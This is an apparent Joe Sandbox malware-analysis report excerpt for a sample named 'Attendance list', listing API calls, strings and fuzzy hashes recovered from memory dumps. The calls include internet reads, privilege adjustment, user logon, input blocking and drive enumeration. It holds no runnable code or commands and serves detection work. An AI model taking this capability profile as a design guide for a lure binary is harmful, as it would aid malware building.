                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($|
                        • API String ID: 1659193697-1631851259
                        • Opcode ID: 92d9b6d6d9db2d82700041a0eeddec467abc8cf479ec4e5581ac6f64dc8bd388
                        • Instruction ID: a6724e6f7c3c5b9ab71745b69feb64a8512ed489aac5793624f1112701ea132d
                        • Opcode Fuzzy Hash: 92d9b6d6d9db2d82700041a0eeddec467abc8cf479ec4e5581ac6f64dc8bd388
                        • Instruction Fuzzy Hash: 59323775A047099FDB28CF19C491AAAB7F1FF48310B15C56EE89ADB3A1D770E981CB40
                        APIs
                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 009326D5
                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0093270C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Internet$AvailableDataFileQueryRead
                        • String ID:
                        • API String ID: 599397726-0
                        • Opcode ID: 8b7779c6a0309eb3605cb64928aa07105aeb443ff12defc5ddda7a7347d702ec
                        • Instruction ID: 72af99b42bff66cedbb85e62abec92d3f564454ba72d76c7a7f96dc476d3a4f2
                        • Opcode Fuzzy Hash: 8b7779c6a0309eb3605cb64928aa07105aeb443ff12defc5ddda7a7347d702ec
                        • Instruction Fuzzy Hash: E841E471904309BFEB20DB59DC86EBBB7FCFF40728F10446AF605A6140EA75AE419E50
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0092B5AE
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0092B608
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0092B655
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: f68f8bfab945120dc6d60ceefc6f2bc5ce9ab94a9e681b405fc3d9803fb8f92a
                        • Instruction ID: cc9a824899c0aa3ffcd48bc1f043de4dcc0aad25d8b77960c8fb482e6775aec8
                        • Opcode Fuzzy Hash: f68f8bfab945120dc6d60ceefc6f2bc5ce9ab94a9e681b405fc3d9803fb8f92a
                        • Instruction Fuzzy Hash: 79215C35A10518EFCB00EFA5E884EAEBBB8FF49310F1480A9E945EB351DB31A955CB51
                        APIs
                          • Part of subcall function 008E0FF6: std::exception::exception.LIBCMT ref: 008E102C
                          • Part of subcall function 008E0FF6: __CxxThrowException@8.LIBCMT ref: 008E1041
                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00918D0D
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00918D3A
                        • GetLastError.KERNEL32 ref: 00918D47
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                        • String ID:
                        • API String ID: 1922334811-0
                        • Opcode ID: ba438cbae0425c2da2dd0cfb7701f1c9c911bec7a693af7fa153c525bc2ac9b7
                        • Instruction ID: 3489924412cfaaba2cba69ce221b33f4d05965c0209d47ea5ef5991bd50f3b17
                        • Opcode Fuzzy Hash: ba438cbae0425c2da2dd0cfb7701f1c9c911bec7a693af7fa153c525bc2ac9b7
                        • Instruction Fuzzy Hash: A81182B5514309AFD728DF58EC85D6BB7BDFB45710B10852EF45693281DF70AC409B60
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00924C2C
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00924C43
                        • FreeSid.ADVAPI32(?), ref: 00924C53
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: cbb1dbbdbc8e3b76b88f720910b438f678fe6b1955ae30f2f587b838f15bfd0f
                        • Instruction ID: e0509a5cf3273df202ff62a97733fe398a164bd21899f1c3cba1f2de3b5263e7
                        • Opcode Fuzzy Hash: cbb1dbbdbc8e3b76b88f720910b438f678fe6b1955ae30f2f587b838f15bfd0f
                        • Instruction Fuzzy Hash: C4F04979A1130DBFDF04DFF4DC99EAEBBBCEF08301F0044A9A901E2181E6706A049B50
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6381e03abf9fb28932b8eb7890650eda982d5aa553b261532efaf5797344ecbe
                        • Instruction ID: 3ad272928e934b15dc2cd195dd4405029137f92a2a76f168277983d2d2288a44
                        • Opcode Fuzzy Hash: 6381e03abf9fb28932b8eb7890650eda982d5aa553b261532efaf5797344ecbe
                        • Instruction Fuzzy Hash: B2227970A0025ACFDB24DF68C484BAAB7B4FF05304F18846DE856EB381E775E985CB91
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 0092C966
                        • FindClose.KERNEL32(00000000), ref: 0092C996
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 18cd080f31f74112ebe45d9217dc7f12eb6111c0a1230995bf09a460437895b0
                        • Instruction ID: 9ea60860a9300dbebe9b769a0e7d35f08b23660a2056e6bd0f6769f128f285a4
                        • Opcode Fuzzy Hash: 18cd080f31f74112ebe45d9217dc7f12eb6111c0a1230995bf09a460437895b0
                        • Instruction Fuzzy Hash: CA118E766106109FD710EF29D849E2AF7E9FF85324F00895EF8A9D7291DB70AC00CB81
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0093977D,?,0094FB84,?), ref: 0092A302
                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0093977D,?,0094FB84,?), ref: 0092A314
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: c022f11e5a9d7d2331a0d3947f18120f374dea3a183fbfd8540e3e60ff5bf9d9
                        • Instruction ID: fb2a73ede7e5b0885a3a1b976dd82e62d899a0c31323888a0d1c27370d46bc4c
                        • Opcode Fuzzy Hash: c022f11e5a9d7d2331a0d3947f18120f374dea3a183fbfd8540e3e60ff5bf9d9
                        • Instruction Fuzzy Hash: 77F0E23511922DEBDB209FA4CC48FEA736CFF09361F004269B908D2181DA309900CBA1
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00918851), ref: 00918728
                        • CloseHandle.KERNEL32(?,?,00918851), ref: 0091873A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: 984e851a8022956b570c7a0b47f3cee6d5ba31b9bbcb1340061bf15a4a3972a9
                        • Instruction ID: 7367cb6af02893ce5c92bd33971e8f8b51e92e410069613891b4295a26f9dc6b
                        • Opcode Fuzzy Hash: 984e851a8022956b570c7a0b47f3cee6d5ba31b9bbcb1340061bf15a4a3972a9
                        • Instruction Fuzzy Hash: 72E0B676014A51EEEB652B65EC09D77BBE9FB057507248829F8A6C0870DB72AC90EB10
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008E8F97,?,?,?,00000001), ref: 008EA39A
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008EA3A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: abf52d9028111d7b8cccdd5e397889f7a9d3fefe5d2c45adbc77bb7d8d89672f
                        • Instruction ID: 7d2af928cad619a3736012360fb4e1b8e2eadbc7b9779ba09eea58abc818d81d
                        • Opcode Fuzzy Hash: abf52d9028111d7b8cccdd5e397889f7a9d3fefe5d2c45adbc77bb7d8d89672f
                        • Instruction Fuzzy Hash: 36B0923506820AABCA002F91EC19F883F68EB46BE2F404020F60D84060EB625450AA91
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46d7c388e050639e5fbd088edbd6f2bac4bee328e7143e040d40f48713a8da87
                        • Instruction ID: ab747a1411550b559c548192b163e8bccf3809c7ab02cd95bc7f1489ea1305fc
                        • Opcode Fuzzy Hash: 46d7c388e050639e5fbd088edbd6f2bac4bee328e7143e040d40f48713a8da87
                        • Instruction Fuzzy Hash: A5322421D2DF414DD7239636D832335A248EFB73D5F25D737E81AB59A6EB28C5835200
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1c01a586fe6e29dac05d1c1df5325382ff0adea63ef66f9e60d10e471fb05ec
                        • Instruction ID: ac668fbc66c61d9879b12dc6ee37ccd123dca7894ebfabd573df5fd45cda3342
                        • Opcode Fuzzy Hash: b1c01a586fe6e29dac05d1c1df5325382ff0adea63ef66f9e60d10e471fb05ec
                        • Instruction Fuzzy Hash: 66B1F220D3AF514DD7239A3A8831336BA5CAFBB2DAF51D71BFC1674D22EB2185835241
                        APIs
                        • __time64.LIBCMT ref: 00928B25
                          • Part of subcall function 008E543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009291F8,00000000,?,?,?,?,009293A9,00000000,?), ref: 008E5443
                          • Part of subcall function 008E543A: __aulldiv.LIBCMT ref: 008E5463
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        APIs
                        • BlockInput.USER32(00000001), ref: 00934218
                        APIs
                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00924EEC
                        APIs
                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009188D1), ref: 00918CB3
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 00902242
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008EA36A
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00937B70
                        • DeleteObject.GDI32(00000000), ref: 00937B82
                        • DestroyWindow.USER32 ref: 00937B90
                        • GetDesktopWindow.USER32 ref: 00937BAA
                        • GetWindowRect.USER32(00000000), ref: 00937BB1
                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00937CF2
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00937D02
                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937D4A
                        • GetClientRect.USER32(00000000,?), ref: 00937D56
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00937D90
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DB2
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DC5
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DD0
                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DD9
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DE8
                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DF1
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DF8
                        • GlobalFree.KERNEL32(00000000), ref: 00937E03
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937E15
                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00952CAC,00000000), ref: 00937E2B
                        • GlobalFree.KERNEL32(00000000), ref: 00937E3B
                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00937E61
                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00937E80
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937EA2
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093808F
                        Strings
                        • String ID: $AutoIt v3$DISPLAY$static
                        APIs
                        • CharUpperBuffW.USER32(?,?,0094F910), ref: 009438AF
                        • IsWindowVisible.USER32(?), ref: 009438D3
                        Strings
                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 0094A89F
                        • GetSysColorBrush.USER32(0000000F), ref: 0094A8D0
                        • GetSysColor.USER32(0000000F), ref: 0094A8DC
                        • SetBkColor.GDI32(?,000000FF), ref: 0094A8F6
                        • SelectObject.GDI32(?,?), ref: 0094A905
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0094A930
                        • GetSysColor.USER32(00000010), ref: 0094A938
                        • CreateSolidBrush.GDI32(00000000), ref: 0094A93F
                        • FrameRect.USER32(?,?,00000000), ref: 0094A94E
                        • DeleteObject.GDI32(00000000), ref: 0094A955
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0094A9A0
                        • FillRect.USER32(?,?,?), ref: 0094A9D2
                        • GetWindowLongW.USER32(?,000000F0), ref: 0094A9FD
                          • Part of subcall function 0094AB60: GetSysColor.USER32(00000012), ref: 0094AB99
                          • Part of subcall function 0094AB60: SetTextColor.GDI32(?,?), ref: 0094AB9D
                          • Part of subcall function 0094AB60: GetSysColorBrush.USER32(0000000F), ref: 0094ABB3
                          • Part of subcall function 0094AB60: GetSysColor.USER32(0000000F), ref: 0094ABBE
                          • Part of subcall function 0094AB60: GetSysColor.USER32(00000011), ref: 0094ABDB
                          • Part of subcall function 0094AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0094ABE9
                          • Part of subcall function 0094AB60: SelectObject.GDI32(?,00000000), ref: 0094ABFA
                          • Part of subcall function 0094AB60: SetBkColor.GDI32(?,00000000), ref: 0094AC03
                          • Part of subcall function 0094AB60: SelectObject.GDI32(?,?), ref: 0094AC10
                          • Part of subcall function 0094AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0094AC2F
                          • Part of subcall function 0094AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0094AC46
                          • Part of subcall function 0094AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0094AC5B
                        APIs
                        • DestroyWindow.USER32(?,?,?), ref: 008C2CA2
                        • DeleteObject.GDI32(00000000), ref: 008C2CE8
                        • DeleteObject.GDI32(00000000), ref: 008C2CF3
                        • DestroyIcon.USER32(00000000,?,?,?), ref: 008C2CFE
                        • DestroyWindow.USER32(00000000,?,?,?), ref: 008C2D09
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 008FC68B
                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008FC6C4
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008FCAED
                          • Part of subcall function 008C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008C2036,?,00000000,?,?,?,?,008C16CB,00000000,?), ref: 008C1B9A
                        • SendMessageW.USER32(?,00001053), ref: 008FCB2A
                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008FCB41
                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008FCB57
                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008FCB62
                        Strings
                        Similarity
                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                        • String ID: 0
                        • API String ID: 464785882-4108050209
                        • Opcode ID: 6e6b5e5bc3bc4dee297737312a30b85bd5c3b671f1f83656e52b6ed61d9f37b0
                        • Instruction ID: 1fb938b8eca4fc59e03e707558870eeba5ee52924b6d7c143937ea422912db49
                        • Opcode Fuzzy Hash: 6e6b5e5bc3bc4dee297737312a30b85bd5c3b671f1f83656e52b6ed61d9f37b0
                        • Instruction Fuzzy Hash: 9E129C34604209EFDB14DF28C984FB9BBB1FF45314F1485A9EA85DB2A2CB31E942DB51
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 009377F1
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009378B0
                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009378EE
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00937900
                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00937946
                        • GetClientRect.USER32(00000000,?), ref: 00937952
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00937996
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009379A5
                        • GetStockObject.GDI32(00000011), ref: 009379B5
                        • SelectObject.GDI32(00000000,00000000), ref: 009379B9
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009379C9
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009379D2
                        • DeleteDC.GDI32(00000000), ref: 009379DB
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00937A07
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00937A1E
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00937A59
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00937A6D
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00937A7E
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00937AAE
                        • GetStockObject.GDI32(00000011), ref: 00937AB9
                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00937AC4
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00937ACE
                        Strings
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 60b72978ccbd40087b323dd9c661de67566792832f609ee8f312ef7f8cc2c5fd
                        • Instruction ID: 92595fe5c0b1c243387a5f46a06c157b4f07c85a0030347e097f2f96f7301dc2
                        • Opcode Fuzzy Hash: 60b72978ccbd40087b323dd9c661de67566792832f609ee8f312ef7f8cc2c5fd
                        • Instruction Fuzzy Hash: D2A182B1A54205BFEB14DBA4DC4AFAEBBB9EB49714F004154FA14EB2E0C770AD00DB60
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0092AF89
                        • GetDriveTypeW.KERNEL32(?,0094FAC0,?,\\.\,0094F910), ref: 0092B066
                        • SetErrorMode.KERNEL32(00000000,0094FAC0,?,\\.\,0094F910), ref: 0092B1C4
                        Strings
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: 9f65b28ba7966ea456c7ee1bc02d7c1d1b2d30a09a4b889202c49759c33584f7
                        • Instruction ID: 42f9a9b85030a9033936838c8d87b1587fbc0bdbb569cec8bf30cc279d625970
                        • Opcode Fuzzy Hash: 9f65b28ba7966ea456c7ee1bc02d7c1d1b2d30a09a4b889202c49759c33584f7
                        • Instruction Fuzzy Hash: D651F331A88715EB8B04DB14E9A2EBD73F4FBD4745B208419E40EE729AC738AD51DB43
                        APIs
                        Strings
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 1038674560-86951937
                        • Opcode ID: 1facb86b22f4d039384a6899940c3473eb6da42f65c336075856bda34f143327
                        • Instruction ID: 20038c926c6288ad39423eb0422fbbcee13bb02c3169c13f989c3df0ba3caba4
